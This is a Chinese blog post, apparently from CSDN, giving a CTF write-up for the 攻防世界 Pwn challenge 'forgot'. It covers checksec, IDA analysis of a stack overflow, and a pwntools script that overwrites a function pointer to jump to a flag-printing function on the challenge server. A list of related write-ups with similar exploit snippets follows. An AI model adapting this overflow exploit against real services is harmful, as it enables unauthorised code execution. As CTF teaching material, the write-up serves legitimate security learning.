攻防世界 Pwn forgot

最新推荐文章于 2024-07-18 20:41:19 发布

原创最新推荐文章于 2024-07-18 20:41:19 发布 · 183 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#安全

Pwn 专栏收录该内容

57 篇文章

订阅专栏

本文详细解析了Pwnforgot挑战的解决过程，包括利用checksec检查安全特性、使用IDA定位漏洞位置、构造payload覆盖返回地址指向flag函数地址，最终通过远程连接获取flag。

攻防世界 Pwn forgot

1.题目下载地址
2.checksec
3.IDA
4.exp

1.题目下载地址

点击下载

2.checksec

在这里插入图片描述
没有canary，可以随便溢出
没有PIE。可以随便使用后门函数

3.IDA

在这里插入图片描述
可以看到有两个溢出点
第一处限制了输入大小，我们就不管了
第二处是一个简单的溢出
只要知道需要覆盖多少byte数据就可以

接下来找到了cat flag的后门
也就是说只要把后门函数的地址直接跟在溢出数据之后就可以控制程序了

4.exp

from pwn import *

io = remote('111.200.241.244',56240)
# io = process("./forgot")
flag_addr = 0x080486CC

io.recv()
io.sendline("kk")

io.recv()
payload = "a" * 32 + "a" * 4 + p32(flag_addr)
io.sendline(payload)

io.interactive()

在这里插入图片描述
得到flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

==Microsoft==

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

攻防世界-pwn forgot(栈内变量覆盖)

菜的只能随便写写博客

10-17

857

0x01 文件检查 32位elf 无栈保护无地址随机化 0x02 程序运行分析发现有两个输入的地方，并且第一个地方有回显。 0x03 IDA分析如图，阅读程序结构后，发现第二个输入点(41行)可以进行栈溢出，第88行是调用的栈里面的函数地址，所以，如果将栈里面的*(&v3 + --v14)这个地址的内容变成我们需要的函数地址，就可以了。搜索字符串，发...

攻防世界：PWN刷题-forgot

m0_53932372的博客

12-30

2355

forgot 这题，可有意思了。大晚上的，有点迷。看了几个wp，一个比一个离谱（太简单了）。后来自己试了试，还真是······ 思路：本题出现了指针变量并且进行了调用，所以可以利用栈溢出漏洞将该地址覆盖为后门函数的地址，让程序正常执行就可以拿到flag。坑：一定要注意啊对v5的判定。 v5初值为1，进过下面的判断等操作后，其值被改变，而v5的值决定了程序调用那个指针所指的位置。 exp一定要注意，输入的v2的第一个字符，决定了v5的值。当输入a的时候，经过判定，v5会变成2，则调用第2-1=1,也

参与评论您还未登录，请先登录后发表或查看评论

攻防世界 forgot

10-04

1433

1.题目 2.IDA分析 3.流程分析流程：输入名字，邮箱，邮箱校验完，执行v3+--v14处的代码。v3原本指向sub_8048604的，我们发现sub_80486CC才是我们需要运行的函数。思路：①为了避免v14影响结果，输入字符避免进入case判断。②通过输入邮箱进行栈溢出覆盖v3的内容，使它指向sub_80486CC。exp如下： from pwn import * #io = process('./level2') io = remote('220.249.52...

攻防世界forgot

qq_25044201的博客

01-06

224

我们用ida来看一下 int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] int (*v3)(); // [esp+30h] [ebp-54h] int (*v4)(); // [esp+34h] [ebp-50h] int (*v5)(); // [esp+38h] [ebp-4Ch] int (*v6)(); // [esp+3Ch] [ebp-48h] int (*v7)(..

[攻防世界]forgot

逆向萌新的博客

06-21

329

[攻防世界]forgot详解

攻防世界pwn题：forgot.doc

07-13

攻击防御世界pwn题：forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc，涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...

攻防世界 pwn forgot

qq_39596232的博客

06-19

501

下面记录一下我在做攻防世界的pwn练习题中的forgot题目的过程，这个题目现在还是有些疑惑的首先我们看一下题目的安全机制：然后IDA看一下主函数： int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] int (*v3)(); // [esp+30h] [ebp-54h] int (*v4)(); // [esp+34h] [ebp-50h] int (*v5)(); .

攻防世界--进阶区--forgot

Rt1Text的博客

06-19

378

32位/只有NX保护输入的地方,是溢出点__isoc99_scanf("%s", v2);fgets(s, 32, stdin);fgets函数对输入的数据有限制,所以不会造成溢出可以拿到flag的函数地址 main函数的内容还挺多的,1张没截完第二张是一个for循环额...........最后一行的代码不是很好看,查了查,可以看看它的汇编应该是调用v3[--v5]的一个函数[esp+78h]就是v5的位置要是可以控制v5也就可以调用函数了在for循环内v5的值一直在发生改变,所以不能让v5进入循环让v

[攻防世界 pwn]——forgot

Y_peak的博客

02-20

283

[攻防世界 pwn]——forgot 题目地址: https://adworld.xctf.org.cn/ 题目: 在checksec看下保护在IDA中, 竟然有后面函数, 找到sub_80486CC函数地址发现最后(*(&v3 + --v14))()执行我们可以令v14 = 1这样就相当于v3所指向的函数执行将v3所指向的函数地址覆盖为我们想要的函数地址就可以了第一个栈溢出无法利用, 第二个可以利用利用’\x00’开头的字符串绕过检查, v2距离v3 = 0x20 e

攻防世界（PWN）forgot

苗_的博客

10-12

380

感觉有些wp写的不是特别详细，当时我看的时候有的地方也是看不太懂... 先拖进ida中看一下：找到溢出点，因为我们分配给了v2 32byte的内存，但是scanf不限制长度，所以这里可以溢出。第88行就是决定程序走向的语句了。初步思路就是栈上的变量覆盖，在v2这里溢出，覆盖掉v3，然后让程序走到sub_80486CC：既然我们要覆盖v3，那么根据（&v3+ --v14）我们需要让v14的值不变，因为v14 = 1则--v14 = 0，这样程序就会顺利的走到v3. 观察

（攻防世界）（pwn）forgot

PLpa的博客

07-21

2501

这题我也是想了好久啊，实在是没找到什么办法，后来还是把题目给摸透了根据经验一个个试出来的方法！！！拿到题目下载附件查看保护：只开了NX，嗯。。。进入IDA，————惊了，这个是啥子意思？？？一大堆奇奇怪怪的东西，实在是看不懂，我们只能看看几个关键的输入点：第一个输入name：没有什么东西，进行看string v2 ：我们看到距离32的地方，有个0x54的函数指针：找...

攻防世界-pwn-forgot

最新发布

2301_80384146的博客

07-18

362

至此：可以知道，出题人想让我们控制字符串的长度和字符类型来控制v5的值，通过控制v5的值来调用在v3指针数组的对应的函数去调用到system函数，但我们只需要1就OK了。且有一个对flag的打印函数(这个函数不咋好找，但就是一个普通函数，地址：0x080486CC)首先你需要输入一个char类型的字符串s[ebp-2ch]（键盘接收函数fgets长度限制31）接收一个char类型的字符串v2[ebp-74h](没有长度要求，为溢出点)大概意思是对v2字符串的前10位做出要求，大于10位退出for循环。

攻防世界pwn题：forgot

m0_62396648的博客

06-05

651

该文件是32位的，canary和PIE保护机制没开。总览：该函数就是：v5初值为1，对v2输入一串字符。然后执行一个会根据输入的字符串而修改v5的循环语句，最后调用相应的函数。同时，发现文件里面已经含有cat flag的函数：函数snprintf介绍： printf("cat %s", "./flag")是将cat ./flag输出到屏幕上。 snprintf(s, 0x32, "cat %s", "./flag")是最多将后

攻防世界——pwn_forgot

syk的博客

05-28

1781

checksec gdb -q ./forgot start i r exp: `#!/usr/bin/env python coding=utf-8 from pwn import * context(arch = ‘i386’, os = ‘linux’) r = remote(‘111.198.29.45’, 32048) overflow = "A"63 addr = 0x080486c...

攻防世界forgot——让人眼花目眩的一道题（详细菜鸡向）

weixin_48066554的博客

02-10

1643

攻防世界forgot——让人眼花目眩的一道题今天做了一道攻防世界的进阶题，看起来复杂的一匹，但是实际上也就这吧 (随手关掉刚刚百度到的wp [doge])，做完后最直观的感受就是自己的代码阅读能力还有待提高。话不多说，先check个sec：只开了NX（栈不可执行），四舍五入等于没开保护，直接上伪代码反汇编伪代码如下： int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] BYREF _DWOR

攻防世界(Pwn) forgot---栈溢出；(方法二)

半岛铁盒的博客

03-02

482

攻防世界(Pwn) forgot—栈溢出；(方法一) 里面对问题描述的更详细一点返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[--v5] v5的值随着for循环会发生改变 v2输入是溢出点 v2,v3两组数据在栈上是相邻的, v2的长度大于 20h之后就会覆盖v3的返回值了干脆把v3[0]-v3[9]函数全部改为目标函数的地址就可以了:0x80486CC 此时无论v5等于什么,我们都会得到目标 fla

C表达式((void (*)(void))0();

雾里看花

11-17

1800

C表达式((void (*)(void))0();通过一步步来讲解：没有参数和不返回值void f(void)定义一个指针没有参数和返回值void (*p)(void)定义一个仅有类型的指针(void(*))(void)定义一个强转类型(类型定义在括号内，跟着一个值)(void (*)(void))0到目前为止我们定义了一个由0强转成一个指向函数且返回值。这个转换时一个指针到函数的类型。（yo

攻防世界(Pwn) forgot---栈溢出；(方法一)

半岛铁盒的博客

03-02

1030

介绍这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一文件运行流程是: 1.先输入名字 2. 输入一串字符串 3.for循环验证字符串v5的值改变;4.返回v3[–5]函数; 1.溢出点 scanf函数 2.漏洞利用最终返回的是 v3[--v5] 的一个函数, v5的值是在for循环之中改变的;v5的初始值是1; 把函数返回的目的地改为　　　0x80486CC就可以了; 只要修改 v3[0]-v3[9] 其中一个就可以了,这里选择修改v3[0] v3[--

《攻防世界》forgot栈空间题

csdn546229768的博客

11-16

3039

哈哈哈，讲下这题的思路，拿到题目又是一大堆的字符串显示在控制台上，本想着又是一道逻辑题，披着逆向算法的外套，害，没办法继续分析前面输入name用了fgets函数但是限制输入长度了，所以直接忽略，然后就是输入一个数对其进行简单的小算法了，我显示分析了一波算法，然后根据出题人的提示说这个，但是我好像还是摸不清题目的漏洞在哪里，就一直摸摸摸，先是简单的看了下全局伪代码，加上程序运行状况，发现你输入的数就算是通过了9层判断条件好像也是一样的打印一些字符串这十个函数里面都是一样的没什么区别然后出题人那个提示

攻防世界pwn-forgot

08-10

- *1* [攻防世界pwn题：forgot](https://blog.youkuaiyun.com/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...